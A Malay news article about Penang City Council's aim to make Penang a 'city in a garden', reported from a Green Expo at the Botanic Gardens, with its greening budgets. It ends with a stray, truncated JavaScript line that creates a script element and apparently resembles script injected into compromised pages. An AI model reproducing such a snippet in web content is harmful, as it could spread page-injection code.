Bandaraya dalam taman, hasrat MBPP

Admin

Gambar : LAW SUUN TING

GEORGE TOWN – Majlis Bandaraya Pulau Pinang (MBPP) berhasrat menjadikan Pulau Pinang sebagai sebuah Bandaraya dalam taman.

Perkara tersebut dinyatakan Pengarah Korporat MBPP, Mohamed Akbar Mustapha pada Majlis Perasmian Ekspo Hijau di Tapak Penjaja Taman Botani di sini baru-baru ini.

“Kita semua pencinta alam semulajadi, kita suka kehijauan dan warna-warni flora.

“Terima kasih kepada pihak urusan Taman Botani yang sudi berkolaborasi dengan MBPP bagi penganjuran kali pertama sempena pengisytiharan bandaraya baru-baru ini.

“Sungguhpun ia (program) cuma diadakan selama dua hari, dengan sambutan yang diterima, pihak MBPP dan Taman Botani mungkin akan jadikan ekspo ini sebagai acara tahunan,” katanya ketika mengadakan tinjauan ke gerai-gerai pameran di sini baru-baru ini.

Turut hadir, Pengarah Taman Botani Pulau Pinang, Mohd. Azwa Shah Ahmad.

Menurut Mohamed Akbar, MBPP telah memperuntukkan sejumlah RM2.1 juta bagi pelaksanaan pelbagai program dan projek penghijauan termasuk penanaman semula dan mencantikkan lanskap.

“Selain itu, kita (MBPP) juga telah mewujudkan lapan taman poket dengan jumlah perbelanjaan mencecah RM1.6 juta,” jelas beliau.

Dalam pada itu, Mohd. Azwa turut bersetuju dengan cadangan MBPP supaya menjadikan Ekspo Hijau sebagai acara tahunan.

“Saya percaya dengan penganjuran ekspo sebegini, pengunjung dapat memperoleh ilmu bukan sahaja tentang tumbuhan, tetapi juga cara-cara penanaman dan penjagaan pokok.

“Selain jualan pokok-pokok bunga dan dedaun, turut dipasarkan adalah kelengkapan berkebun, biji benih sayur-sayuran organik dan juga baja,’’ ujarnya.

var d=document;var s=d.createElement(‘script’);